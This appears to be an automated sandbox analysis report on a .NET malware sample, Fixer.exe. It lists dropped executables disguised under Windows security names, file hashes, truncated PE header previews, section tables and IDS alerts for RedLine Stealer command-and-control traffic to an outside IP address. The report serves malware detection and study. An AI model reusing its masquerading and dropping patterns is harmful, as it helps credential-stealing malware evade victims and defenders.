                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPyEsWzAbDLI4MNuxYmzhaOKbbDLI4MWuPOKMAKhav:ML9E4Ka6sXE4rKDE4KGKMAKhk
                                                                                                                                                                                                                                              MD5:D0B0E2BB1DA8256FC05A6806EBFF2A2B
                                                                                                                                                                                                                                              SHA1:01C0959989F2EABCC7FF3B6F969B512882878A7A
                                                                                                                                                                                                                                              SHA-256:60B65653982E4426062BF6BF0094CCD3A6E340FBC713BFCE1244140A218B0DA8
                                                                                                                                                                                                                                              SHA-512:4939E533C93161CAEC3BFD7BD6FACB8CAF9188DA3491D2063DB7AA29C8865658B1F0FFA1018B0197D4C79D22779BF17E30C2BAFF1F2C886EED1A8084BD2DA9DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xdwdSecurityHealthSystrays.exe.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):642
                                                                                                                                                                                                                                              Entropy (8bit):5.343714716785993
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPyEsWzAbDLI4MNuxYmzhaOKbbDLI4MWuPOKMAKhav:ML9E4Ka6sXE4rKDE4KGKMAKhk
                                                                                                                                                                                                                                              MD5:D0B0E2BB1DA8256FC05A6806EBFF2A2B
                                                                                                                                                                                                                                              SHA1:01C0959989F2EABCC7FF3B6F969B512882878A7A
                                                                                                                                                                                                                                              SHA-256:60B65653982E4426062BF6BF0094CCD3A6E340FBC713BFCE1244140A218B0DA8
                                                                                                                                                                                                                                              SHA-512:4939E533C93161CAEC3BFD7BD6FACB8CAF9188DA3491D2063DB7AA29C8865658B1F0FFA1018B0197D4C79D22779BF17E30C2BAFF1F2C886EED1A8084BD2DA9DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fixer.exe.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3094
                                                                                                                                                                                                                                              Entropy (8bit):5.336981480211611
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Pq5q12wCYqh6oPtIAeqzhPfzmaAqdqPuq7qqjqaHR+5VD:Pq5q12wCYqh6qtIAeqzhPfyzqdqmq7qv
                                                                                                                                                                                                                                              MD5:DCAD26FFEA25FCE4E3DB8605106AB4CA
                                                                                                                                                                                                                                              SHA1:5C2F9711972DB2054469F37CBBBE28DDE14457C8
                                                                                                                                                                                                                                              SHA-256:B848B7ED3D2806453CAEAD017847C96A118A657003C256BE0F87D255CD2F193E
                                                                                                                                                                                                                                              SHA-512:4A72A5897F3026F91DF11DB5E96AD2217149CC8C6AF5F2AC359355A48DD7DBA9C7C467109F23D721811C9FA089BD159B9BFD19D3E87694F788DC74B7EFE87ADF
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):471107
                                                                                                                                                                                                                                              Entropy (8bit):6.664478759847773
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:G8qTx8oaV9Ta1UGwUVBRIYRrpyLvx5aatth:kaVVa+GwyHvlGv/jX
                                                                                                                                                                                                                                              MD5:2E2BF344AC14353A679CCDD682273BE0
                                                                                                                                                                                                                                              SHA1:92ED1E2EAE84405DF7FE700BA108F04E498C6CB1
                                                                                                                                                                                                                                              SHA-256:9CD1297AB41D9DACADA4F728935BECB08533480326BAB6687DD8BE2DB76F91E7
                                                                                                                                                                                                                                              SHA-512:012E5031B9D413547AA98E6C61A2CA0E658C471D8EEAE4AAA16F100C30BF98C74929D4589A722AE7914BBFD9E60314BA10757BD93E4E521570D4B153CAB21FC7
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s][f............................n1... ...@....@.. ....................................@..................................1..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P1......H...........XD...............$...........................................W.......4...f.2..W.....H3......3.......".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\FixerNerest.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):398579
                                                                                                                                                                                                                                              Entropy (8bit):6.187747366960712
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:udqn92Oey3hWpanij1Ck6QQWFti9Ez2bDLujYzYm12JLXUsGytEqQ:uIn92O335ijomti9EzsOJL+UEq
                                                                                                                                                                                                                                              MD5:094EBE271C9334745C238FC2BA77FD38
                                                                                                                                                                                                                                              SHA1:3BC39EE84886A41A621F4B3047FE437DEE266269
                                                                                                                                                                                                                                              SHA-256:59B32D9062B72F23B8CB1F6D5F137E07E40B2F59CF46E548C22721CDE8568474
                                                                                                                                                                                                                                              SHA-512:79BBAA9950C9B0A82B486E88259EFCF081B0B4EB3F50C00DF969A18F8035EEC46AFD65F42D31DF5E119A548FB2CF6C19A79B4C2194DABDD331E89A13AECE9D66
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s][f............................./... ...@....@.. .......................@............@.....................................O....@..................H$... ....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc....... ......................@..B........................H........... _...........................................................W.......4...f.2..W.....H3......3.......".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....

                                                                                                                                                                                                                                              C:\Windows\System32\Defender.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\FixerNerest.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):753276147
                                                                                                                                                                                                                                              Entropy (8bit):0.0077968863233513885
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:6C49C48E82A1B13AC0406AD8B049E7DE
                                                                                                                                                                                                                                              SHA1:9EFE8FE8C404ADA4281DA0DBE3B26306C9B7A95B
                                                                                                                                                                                                                                              SHA-256:1E434C27665EF7E8E28D3E22C3683F4DE0C1329D01E4CD4D4199DABEB25BA6D4
                                                                                                                                                                                                                                              SHA-512:16CC45C26EC9EBDB83CA353D67C42AD40048AD43DD34C6106FC7CF86968C381339046A90C6A39418E00E8E42088778F4EE76F146A8C8B60F7D1E00D310E2DCC5
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s][f............................./... ...@....@.. .......................@............@.....................................O....@..................H$... ....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc....... ......................@..B........................H........... _...........................................................W.......4...f.2..W.....H3......3.......".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....

                                                                                                                                                                                                                                              C:\Windows\System32\xdwdSecurityHealthSystrays.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):735522883
                                                                                                                                                                                                                                              Entropy (8bit):0.009974453903565014
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:0AC0B9DEA199D2DF1593CAB96613CB52
                                                                                                                                                                                                                                              SHA1:D3F577D3DBAD9F94B99A6EE6731D9D9AF5ACE49C
                                                                                                                                                                                                                                              SHA-256:EF11384917C68D635A16C5DDAD10DB19EA021B5B0391610D89B777B147713551
                                                                                                                                                                                                                                              SHA-512:09B427512396E4B46F1E037B00661DF17612CD95CEB5C6CAC28D9F6D75133189FCFA293371AA50086122786A27D7C42161F439381C800D775B288DA64FEBA0DF
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s][f............................n1... ...@....@.. ....................................@..................................1..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P1......H...........XD...............$...........................................W.......4...f.2..W.....H3......3.......".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....*".(.....

                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):5.081407378293017
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                              File name:Fixer.exe
                                                                                                                                                                                                                                              File size:307'712 bytes
                                                                                                                                                                                                                                              MD5:2acda1f917022e9e8081ad69b15330c6
                                                                                                                                                                                                                                              SHA1:3bad975d496a0066d64470e4ae1002794581c4f8
                                                                                                                                                                                                                                              SHA256:7bc2586b6d70b12f116dc8f538f58665620a765e2c764a5c143b06ec97bacfc0
                                                                                                                                                                                                                                              SHA512:958b0298777807763a0abd44c7a9252838625a2cd73eda6537d7a453aa5ed434282dbec6a126899bb35912e1615fa4e77461a2c1b4f7912d91a35fb44b439d93
                                                                                                                                                                                                                                              SSDEEP:3072:icZqf7D34qp/0+mAGkyYaxQwgrRB1fA0PuTVAtkxza3R0eqiOL2bBOA:icZqf7DIqnm2lB1fA0GTV8kk8L
                                                                                                                                                                                                                                              TLSH:B5645A5833E8C910DA7F4775D861D67093B0BCA3A552E70B4FC4ACAB3D32740EA51AB6
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@................................

                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                              Icon Hash:4d8ea38d85a38e6d

                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Entrypoint:0x43029e
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x302440x57.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x320000x1c9c6.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x500000xc.reloc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              .text0x20000x2e2a40x2e400fde816a3b3ae0ecacd5e5ab05f73a727False0.47479413006756754data6.186366061893661IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .rsrc0x320000x1c9c60x1ca00a8cf3f8ff27a4a736ba8fb433d91107fFalse0.2380765556768559data2.615031395625776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .reloc0x500000xc0x200ad0a6b4525092f96ee7808055cdae654False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                              RT_ICON0x322200x3d04PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9934058898847631
                                                                                                                                                                                                                                              RT_ICON0x35f240x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.09013072282030049
                                                                                                                                                                                                                                              RT_ICON0x4674c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.13905290505432216
                                                                                                                                                                                                                                              RT_ICON0x4a9740x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.17033195020746889
                                                                                                                                                                                                                                              RT_ICON0x4cf1c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.2045028142589118
                                                                                                                                                                                                                                              RT_ICON0x4dfc40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.24645390070921985
                                                                                                                                                                                                                                              RT_GROUP_ICON0x4e42c0x5adata0.7666666666666667
                                                                                                                                                                                                                                              RT_VERSION0x4e4880x352data0.4447058823529412
                                                                                                                                                                                                                                              RT_MANIFEST0x4e7dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                              2025-01-08T11:24:21.358270+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:21.358270+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:21.630664+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response189.23.97.1211112192.168.11.2049748TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:26.669865+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:27.070524+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:27.708030+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:28.033899+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:28.848988+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:29.121943+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:29.393622+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:29.695937+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:29.970275+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:30.244400+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:30.586256+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
                                                                                                                                                                                                                                              2025-01-08T11:24:30.939569+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.11.204974889.23.97.1211112TCP
